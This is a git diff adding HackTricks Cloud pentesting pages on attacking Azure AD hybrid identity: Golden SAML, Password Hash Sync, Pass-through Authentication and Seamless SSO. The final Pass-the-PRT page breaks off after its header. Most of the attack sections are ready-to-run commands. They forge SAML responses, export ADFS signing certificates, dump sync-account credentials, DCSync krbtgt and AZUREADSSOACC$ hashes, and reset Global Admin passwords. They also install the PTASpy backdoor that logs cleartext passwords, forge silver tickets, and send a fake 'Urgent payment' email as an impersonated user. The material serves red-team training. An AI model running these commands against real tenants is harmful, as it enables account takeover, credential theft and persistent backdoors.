+ +Bsiacally, in Federation, all **authentication** occurs in the **on-prem** environment and the user experiences SSO across all the trusted environments. Therefore, users can **access** **cloud** applications by using their **on-prem credentials**. + +**Security Assertion Markup Language (SAML)** is used for **exchanging** all the authentication and authorization **information** between the providers. + +In any federation setup there are three parties: + +* User or Client +* Identity Provider (IdP) +* Service Provider (SP) + +(Images from https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps) + +
+ +1. Initially, an application (Service Provider or SP, such as AWS console or vSphere web client) is accessed by a user. This step might be bypassed, leading the client directly to the IdP (Identity Provider) depending on the specific implementation. +2. Subsequently, the SP identifies the appropriate IdP (e.g., AD FS, Okta) for user authentication. It then crafts a SAML (Security Assertion Markup Language) AuthnRequest and reroutes the client to the chosen IdP. +3. The IdP takes over, authenticating the user. Post-authentication, a SAMLResponse is formulated by the IdP and forwarded to the SP through the user. +4. Finally, the SP evaluates the SAMLResponse. If validated successfully, implying a trust relationship with the IdP, the user is granted access. This marks the completion of the login process, allowing the user to utilize the service. + +**If you want to learn more about SAML authentication and common attacks go to:** + +{% embed url="https://book.hacktricks.xyz/pentesting-web/saml-attacks" %} + +## Pivoting + +* AD FS is a claims-based identity model. +* "..claimsaresimplystatements(forexample,name,identity,group), made about users, that are used primarily for authorizing access to claims-based applications located anywhere on the Internet." +* Claims for a user are written inside the SAML tokens and are then signed to provide confidentiality by the IdP. +* A user is identified by ImmutableID. It is globally unique and stored in Azure AD. +* TheImmuatbleIDisstoredon-premasms-DS-ConsistencyGuidforthe user and/or can be derived from the GUID of the user. +* More info in [https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/technical-reference/the-role-of-claims](https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/technical-reference/the-role-of-claims) + +**Golden SAML attack:** + +* In ADFS, SAML Response is signed by a token-signing certificate. 
+* If the certificate is compromised, it is possible to authenticate to the Azure AD as ANY user synced to Azure AD! +* Just like our PTA abuse, password change for a user or MFA won't have any effect because we are forging the authentication response. +* The certificate can be extracted from the AD FS server with DA privileges and then can be used from any internet connected machine. +* More info in [https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps) + +### Golden SAML + +The process where an **Identity Provider (IdP)** produces a **SAMLResponse** to authorize user sign-in is paramount. Depending on the IdP's specific implementation, the **response** might be **signed** or **encrypted** using the **IdP's private key**. This procedure enables the **Service Provider (SP)** to confirm the authenticity of the SAMLResponse, ensuring it was indeed issued by a trusted IdP. + +A parallel can be drawn with the [golden ticket attack](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket), where the key authenticating the user’s identity and permissions (KRBTGT for golden tickets, token-signing private key for golden SAML) can be manipulated to **forge an authentication object** (TGT or SAMLResponse). This allows impersonation of any user, granting unauthorized access to the SP. + +Golden SAMLs offer certain advantages: + +* They can be **created remotely**, without the need to be part of the domain or federation in question. +* They remain effective even with **Two-Factor Authentication (2FA)** enabled. +* The token-signing **private key does not automatically renew**. +* **Changing a user’s password does not invalidate** an already generated SAML. 
+ +#### AWS + AD FS + Golden SAML + +[Active Directory Federation Services (AD FS)](https://docs.microsoft.com/en-us/previous-versions/windows/server-2008/bb897402\(v=msdn.10\)) is a Microsoft service that facilitates the **secure exchange of identity information** between trusted business partners (federation). It essentially allows a domain service to share user identities with other service providers within a federation. + +With AWS trusting the compromised domain (in a federation), this vulnerability can be exploited to potentially **acquire any permissions in the AWS environment**. The attack necessitates the **private key used to sign the SAML objects**, akin to needing the KRBTGT in a golden ticket attack. Access to the AD FS user account is sufficient to obtain this private key. + +The requirements for executing a golden SAML attack include: + +* **Token-signing private key** +* **IdP public certificate** +* **IdP name** +* **Role name (role to assume)** +* Domain\username +* Role session name in AWS +* Amazon account ID + +_Only the items in bold are mandatory. The others can be filled in as desired._ + +To acquire the **private key**, access to the **AD FS user account** is necessary. From there, the private key can be **exported from the personal store** using tools like [mimikatz](https://github.com/gentilkiwi/mimikatz). 
To gather the other required information, you can utilize the Microsoft.Adfs.Powershell snapin as follows, ensuring you're logged in as the ADFS user: + +```powershell +# From an "AD FS" session +# After having exported the key with mimikatz + +# ADFS Public Certificate +[System.Convert]::ToBase64String($cer.rawdata) + +# IdP Name +(Get-ADFSProperties).Identifier.AbsoluteUri + +# Role Name +(Get-ADFSRelyingPartyTrust).IssuanceTransformRule +``` + +With all the information, it's possible to forget a valid SAMLResponse as the user you want to impersonate using [**shimit**](https://github.com/cyberark/shimit)**:** + +{% code overflow="wrap" %} +```bash +# Apply session for AWS cli +python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 +# idp - Identity Provider URL e.g. http://server.domain.com/adfs/services/trust +# pk - Private key file full path (pem format) +# c - Certificate file full path (pem format) +# u - User and domain name e.g. domain\username (use \ or quotes in *nix) +# n - Session name in AWS +# r - Desired roles in AWS. Supports Multiple roles, the first one specified will be assumed. +# id - AWS account id e.g. 123456789012 + +# Save SAMLResponse to file +python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml +``` +{% endcode %} + +
+ +### On-prem -> cloud + +```powershell +# With a domain user you can get the ImmutableID of the target user +[System.Convert]::ToBase64String((Get-ADUser -Identity | select -ExpandProperty ObjectGUID).tobytearray()) + +# On AD FS server execute as administrator +Get-AdfsProperties | select identifier + +# When setting up the AD FS using Azure AD Connect, there is a difference between IssueURI on ADFS server and Azure AD. +# You need to use the one from AzureAD. +# Therefore, check the IssuerURI from Azure AD too (Use MSOL module and need GA privs) +Get-MsolDomainFederationSettings -DomainName deffin.com | select IssuerUri + +# Extract the ADFS token signing certificate from the ADFS server using AADInternals +Export-AADIntADFSSigningCertificate + +# Impersonate a user to to access cloud apps +Open-AADIntOffice365Portal -ImmutableID v1pOC7Pz8kaT6JWtThJKRQ== -Issuer http://deffin.com/adfs/services/trust -PfxFileName C:\users\adfsadmin\Documents\ADFSSigningCertificate.pfx -Verbose +``` + +It's also possible to create ImmutableID of cloud only users and impersonate them + +```powershell +# Create a realistic ImmutableID and set it for a cloud only user +[System.Convert]::ToBase64String((New-Guid).tobytearray()) +Set-AADIntAzureADObject -CloudAnchor "User_19e466c5-d938-1293-5967-c39488bca87e" -SourceAnchor "aodilmsic30fugCUgHxsnK==" + +# Extract the ADFS token signing certificate from the ADFS server using AADInternals +Export-AADIntADFSSigningCertificate + +# Impersonate the user +Open-AADIntOffice365Portal -ImmutableID "aodilmsic30fugCUgHxsnK==" -Issuer http://deffin.com/adfs/services/trust -PfxFileName C:\users\adfsadmin\Desktop\ADFSSigningCertificate.pfx -Verbose +``` + +## References + +* [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed) +* 
[https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md new file mode 100644 index 0000000000..a509782ebb --- /dev/null +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md @@ -0,0 +1,150 @@ +# Az - PHS - Password Hash Sync + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-phs) **Password hash synchronization** is one of the sign-in methods used to accomplish hybrid identity. **Azure AD Connect** synchronizes a hash, of the hash, of a user's password from an on-premises Active Directory instance to a cloud-based Azure AD instance. + +
+ +It's the **most common method** used by companies to synchronize an on-prem AD with Azure AD. + +All **users** and a **hash of the password hashes** are synchronized from the on-prem to Azure AD. However, **clear-text passwords** or the **original** **hashes** aren't sent to Azure AD.\ +Moreover, **Built-in** security groups (like domain admins...) are **not synced** to Azure AD. + +The **hashes syncronization** occurs every **2 minutes**. However, by default, **password expiry** and **account** **expiry** are **not sync** in Azure AD. So, a user whose **on-prem password is expired** (not changed) can continue to **access Azure resources** using the old password. + +When an on-prem user wants to access an Azure resource, the **authentication takes place on Azure AD**. + +**PHS** is required for features like **Identity Protection** and AAD Domain Services. + +## Pivoting + +When PHS is configured some **privileged accounts** are automatically **created**: + +* The account **`MSOL_`** is automatically created in on-prem AD. This account is given a **Directory Synchronization Accounts** role (see [documentation](https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles#directory-synchronization-accounts-permissions)) which means that it has **replication (DCSync) permissions in the on-prem AD**. +* An account **`Sync__installationID`** is created in Azure AD. This account can **reset password of ANY user** (synced or cloud only) in Azure AD. + +Passwords of the two previous privileged accounts are **stored in a SQL server** on the server where **Azure AD Connect is installed.** Admins can extract the passwords of those privileged users in clear-text.\ +The database is located in `C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf`. 
+ +It's possible to extract the configuration from one of the tables, being one encrypted: + +`SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent;` + +The **encrypted configuration** is encrypted with **DPAPI** and it contains the **passwords of the `MSOL_*`** user in on-prem AD and the password of **Sync\_\*** in AzureAD. Therefore, compromising these it's possible to privesc to the AD and to AzureAD. + +You can find a [full overview of how these credentials are stored and decrypted in this talk](https://www.youtube.com/watch?v=JEIR5oGCwdg). + +### Finding the **Azure AD connect server** + +If the **server where Azure AD connect is installed** is domain joined (recommended in the docs), it's possible to find it with: + +```powershell +# ActiveDirectory module +Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Properties * | select SamAccountName,Description | fl + +#Azure AD module +Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"} +``` + +### Abusing MSOL\_\* + +```powershell +# Once the Azure AD connect server is compromised you can extract credentials with the AADInternals module +Get-AADIntSyncCredentials + +# Using the creds of MSOL_* account, you can run DCSync against the on-prem AD +runas /netonly /user:defeng.corp\MSOL_123123123123 cmd +Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local /dc:dc.domain.local"' +``` + +{% hint style="danger" %} +You can also use [**adconnectdump**](https://github.com/dirkjanm/adconnectdump) to obtain these credentials. 
+{% endhint %} + +### Abusing Sync\_\* + +Compromising the **`Sync_*`** account it's possible to **reset the password** of any user (including Global Administrators) + +```powershell +# This command, run previously, will give us alse the creds of this account +Get-AADIntSyncCredentials + +# Get access token for Sync_* account +$passwd = ConvertTo-SecureString '' -AsPlainText - Force +$creds = New-Object System.Management.Automation.PSCredential ("Sync_SKIURT-JAUYEH_123123123123@domain.onmicrosoft.com", $passwd) +Get-AADIntAccessTokenForAADGraph -Credentials $creds - SaveToCache + +# Get global admins +Get-AADIntGlobalAdmins + +# Get the ImmutableId of an on-prem user in Azure AD (this is the Unique Identifier derived from on-prem GUID) +Get-AADIntUser -UserPrincipalName onpremadmin@domain.onmicrosoft.com | select ImmutableId + +# Reset the users password +Set-AADIntUserPassword -SourceAnchor "3Uyg19ej4AHDe0+3Lkc37Y9=" -Password "JustAPass12343.%" -Verbose + +# Now it's possible to access Azure AD with the new password and op-prem with the old one (password changes aren't sync) +``` + +It's also possible to **modify the passwords of only cloud** users (even if that's unexpected) + +```powershell +# To reset the password of cloud only user, we need their CloudAnchor that can be calculated from their cloud objectID +# The CloudAnchor is of the format USER_ObjectID. +Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,ObjectID + +# Reset password +Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37" -Password "JustAPass12343.%" -Verbosewers +``` + +It's also possible to dump the password of this user. + +{% hint style="danger" %} +Another option would be to **assign privileged permissions to a service principal**, which the **Sync** user has **permissions** to do, and then **access that service principal** as a way of privesc. 
+{% endhint %} + +### Seamless SSO + +It's possible to use Seamless SSO with PHS, which is vulnerable to other abuses. Check it in: + +{% content-ref url="seamless-sso.md" %} +[seamless-sso.md](seamless-sso.md) +{% endcontent-ref %} + +## References + +* [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs) +* [https://aadinternals.com/post/on-prem\_admin/](https://aadinternals.com/post/on-prem_admin/) +* [https://troopers.de/downloads/troopers19/TROOPERS19\_AD\_Im\_in\_your\_cloud.pdf](https://troopers.de/downloads/troopers19/TROOPERS19_AD_Im_in_your_cloud.pdf) +* [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md new file mode 100644 index 0000000000..d846733589 --- /dev/null +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md @@ -0,0 +1,100 @@ +# Az - PTA - Pass-through Authentication + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-pta) Azure Active Directory (Azure AD) Pass-through Authentication allows your users to **sign in to both on-premises and cloud-based applications using the same passwords**. This feature provides your users a better experience - one less password to remember, and reduces IT helpdesk costs because your users are less likely to forget how to sign in. When users sign in using Azure AD, this feature **validates users' passwords directly against your on-premises Active Directory**. + +In PTA **identities** are **synchronized** but **passwords** **aren't** like in PHS. + +The authentication is validated in the on-prem AD and the communication with cloud is done by an **authentication agent** running in an **on-prem server** (it does't need to be on the on-prem DC). + +### Authentication flow + +
+ +1. To **login** the user is redirected to **Azure AD**, where he sends the **username** and **password** +2. The **credentials** are **encrypted** and set in a **queue** in Azure AD +3. The **on-prem authentication agent** gathers the **credentials** from the queue and **decrypts** them. This agent is called **"Pass-through authentication agent"** or **PTA agent.** +4. The **agent** **validates** the creds against the **on-prem AD** and sends the **response** **back** to Azure AD which, if the response is positive, **completes the login** of the user. + +{% hint style="warning" %} +If an attacker **compromises** the **PTA** he can **see** the all **credentials** from the queue (in **clear-text**).\ +He can also **validate any credentials** to the AzureAD (similar attack to Skeleton key). +{% endhint %} + +### On-Prem -> cloud + +If you have **admin** access to the **Azure AD Connect server** with the **PTA** **agent** running, you can use the **AADInternals** module to **insert a backdoor** that will **validate ALL the passwords** introduced (so all passwords will be valid for authentication): + +```powershell +Install-AADIntPTASpy +``` + +{% hint style="info" %} +If the **installation fails**, this is probably due to missing [Microsoft Visual C++ 2015 Redistributables](https://download.microsoft.com/download/6/A/A/6AA4EDFF-645B-48C5-81CC-ED5963AEAD48/vc_redist.x64.exe). +{% endhint %} + +It's also possible to **see the clear-text passwords sent to PTA agent** using the following cmdlet on the machine where the previous backdoor was installed: + +```powershell +Get-AADIntPTASpyLog -DecodePasswords +``` + +This backdoor will: + +* Create a hidden folder `C:\PTASpy` +* Copy a `PTASpy.dll` to `C:\PTASpy` +* Injects `PTASpy.dll` to `AzureADConnectAuthenticationAgentService` process + +{% hint style="info" %} +When the AzureADConnectAuthenticationAgent service is restarted, PTASpy is “unloaded” and must be re-installed. 
+{% endhint %} + +### Cloud -> On-Prem + +{% hint style="danger" %} +After getting **GA privileges** on the cloud, it's possible to **register a new PTA agent** by setting it on an **attacker controlled machine**. Once the agent is **setup**, we can **repeat** the **previous** steps to **authenticate using any password** and also, **get the passwords in clear-text.** +{% endhint %} + +### Seamless SSO + +It's possible to use Seamless SSO with PTA, which is vulnerable to other abuses. Check it in: + +{% content-ref url="seamless-sso.md" %} +[seamless-sso.md](seamless-sso.md) +{% endcontent-ref %} + +## References + +* [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta) +* [https://aadinternals.com/post/on-prem\_admin/#pass-through-authentication](https://aadinternals.com/post/on-prem_admin/#pass-through-authentication) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md new file mode 100644 index 0000000000..75a5557f09 --- /dev/null +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md @@ -0,0 +1,147 @@ +# Az - Seamless SSO + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sso) Azure Active Directory Seamless Single Sign-On (Azure AD Seamless SSO) automatically **signs users in when they are on their corporate devices** connected to your corporate network. When enabled, **users don't need to type in their passwords to sign in to Azure AD**, and usually, even type in their usernames. This feature provides your users easy access to your cloud-based applications without needing any additional on-premises components. + +

https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sso-how-it-works

+ +Basically Azure AD Seamless SSO **signs users** in when they are **on a on-prem domain joined PC**. + +It's supported by both [**PHS (Password Hash Sync)**](phs-password-hash-sync.md) and [**PTA (Pass-through Authentication)**](pta-pass-through-authentication.md). + +Desktop SSO is using **Kerberos** for authentication. When configured, Azure AD Connect creates a **computer account called AZUREADSSOACC`$`** in on-prem AD. The password of the `AZUREADSSOACC$` account is **sent as plain-text to Azure AD** during the configuration. + +The **Kerberos tickets** are **encrypted** using the **NTHash (MD4)** of the password and Azure AD is using the sent password to decrypt the tickets. + +**Azure AD** exposes an **endpoint** (https://autologon.microsoftazuread-sso.com) that accepts Kerberos **tickets**. Domain-joined machine's browser forwards the tickets to this endpoint for SSO. + +### On-prem -> cloud + +The **password** of the user **`AZUREADSSOACC$` never changes**. Therefore, a domain admin could compromise the **hash of this account**, and then use it to **create silver tickets** to connect to Azure with **any on-prem user synced**: + +```powershell +# Dump hash using mimikatz +Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:domain.local /dc:dc.domain.local"' + mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit + +# Dump hash using https://github.com/MichaelGrafnetter/DSInternals +Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' -Domain contoso -Server lon-dc1.contoso.local + +# Dump using ntdsutil and DSInternals +## Dump NTDS.dit +ntdsutil "ac i ntds" "ifm” "create full C:\temp" q q +## Extract password +Install-Module DSInternals +Import-Module DSInternals +$key = Get-BootKey -SystemHivePath 'C:\temp\registry\SYSTEM' +(Get-ADDBAccount -SamAccountName 'AZUREADSSOACC$' -DBPath 'C:\temp\Active Directory\ntds.dit' -BootKey $key).NTHash | Format-Hexos +``` + +With the hash you can now **generate silver tickets**: + 
+```powershell +# Get users and SIDs +Get-AzureADUser | Select UserPrincipalName,OnPremisesSecurityIdentifier + +# Create a silver ticket to connect to Azure with mimikatz +Invoke-Mimikatz -Command '"kerberos::golden /user:onpremadmin /sid:S-1-5-21-123456789-1234567890-123456789 /id:1105 /domain:domain.local /rc4: /target:aadg.windows.net.nsatc.net /service:HTTP /ptt"' +mimikatz.exe "kerberos::golden /user:elrond /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 /domain:contoso.local /rc4:12349e088b2c13d93833d0ce947676dd /target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit + +# Create silver ticket with AADInternal to access Exchange Online +$kerberos=New-AADIntKerberosTicket -SidString "S-1-5-21-854168551-3279074086-2022502410-1104" -Hash "097AB3CBED7B9DD6FE6C992024BC38F4" +$at=Get-AADIntAccessTokenForEXO -KerberosTicket $kerberos -Domain company.com +## Send email +Send-AADIntOutlookMessage -AccessToken $at -Recipient "someone@company.com" -Subject "Urgent payment" -Message "

Urgent!


The following bill should be paid asap." +``` + +To utilize the silver ticket, the following steps should be executed: + +1. **Initiate the Browser:** Mozilla Firefox should be launched. +2. **Configure the Browser:** + * Navigate to **`about:config`**. + * Set the preference for [network.negotiate-auth.trusted-uris](https://github.com/mozilla/policy-templates/blob/master/README.md#authentication) to the specified [values](https://docs.microsoft.com/en-us/azure/active-directory/connect/active-directory-aadconnect-sso#ensuring-clients-sign-in-automatically): + * `https://aadg.windows.net.nsatc.net` + * `https://autologon.microsoftazuread-sso.com` +3. **Access the Web Application:** + * Visit a web application that is integrated with the organization's AAD domain. A common example is [Office 365](https://portal.office.com/). +4. **Authentication Process:** + * At the logon screen, the username should be entered, leaving the password field blank. + * To proceed, press either TAB or ENTER. + +{% hint style="success" %} +This doesn't bypass MFA if enabled +{% endhint %} + +#### Option 2 without dcsync - SeamlessPass + +It's also possible to perform this attack **without a dcsync attack** to be more stealth as [explained in this blog post](https://malcrove.com/seamlesspass-leveraging-kerberos-tickets-to-access-the-cloud/). For that you only need one of the following: + +* **A compromised user's TGT:** Even if you don't have one but the user was compromised,you can get one using fake TGT delegation trick implemented in many tools such as [Kekeo](https://x.com/gentilkiwi/status/998219775485661184) and [Rubeus](https://posts.specterops.io/rubeus-now-with-more-kekeo-6f57d91079b9). +* **Golden Ticket**: If you have the KRBTGT key, you can create the TGT you need for the attacked user. 
+* **A compromised user’s NTLM hash or AES key:** SeamlessPass will communicate with the domain controller with this information to generate the TGT +* **AZUREADSSOACC$ account NTLM hash or AES key:** With this info and the user’s Security Identifier (SID) to attack it's possible to create a service ticket an authenticate with the cloud (as performed in the previous method). + +Finally, with the TGT it's possible to use the tool [**SeamlessPass**](https://github.com/Malcrove/SeamlessPass) with: + +{% code overflow="wrap" %} +``` +seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -tgt +``` +{% endcode %} + +Further information to set Firefox to work with seamless SSO can be [**found in this blog post**](https://malcrove.com/seamlesspass-leveraging-kerberos-tickets-to-access-the-cloud/). + +#### ~~Creating Kerberos tickets for cloud-only users~~ + +If the Active Directory administrators have access to Azure AD Connect, they can **set SID for any cloud-user**. This way Kerberos **tickets** can be **created also for cloud-only users**. The only requirement is that the SID is a proper [SID](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc778824\(v=ws.10\)). + +{% hint style="danger" %} +Changing SID of cloud-only admin users is now **blocked by Microsoft**.\ +For info check [https://aadinternals.com/post/on-prem\_admin/](https://aadinternals.com/post/on-prem_admin/) +{% endhint %} + +### On-prem -> Cloud via Resource Based Constrained Delegation + +Anyone that can manage computer accounts (`AZUREADSSOACC$`) in the container or OU this account is in, it can **configure a resource based constrained delegation over the account and access it**. 
+ +```python +python rbdel.py -u \\ -p azureadssosvc$ +``` + +## References + +* [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso) +* [https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) +* [https://aadinternals.com/post/on-prem\_admin/](https://aadinternals.com/post/on-prem_admin/) +* [TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory](https://www.youtube.com/watch?v=JEIR5oGCwdg) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md new file mode 100644 index 0000000000..4cef6beb1e --- /dev/null +++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md @@ -0,0 +1,321 @@ +# Az - Pass the PRT + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
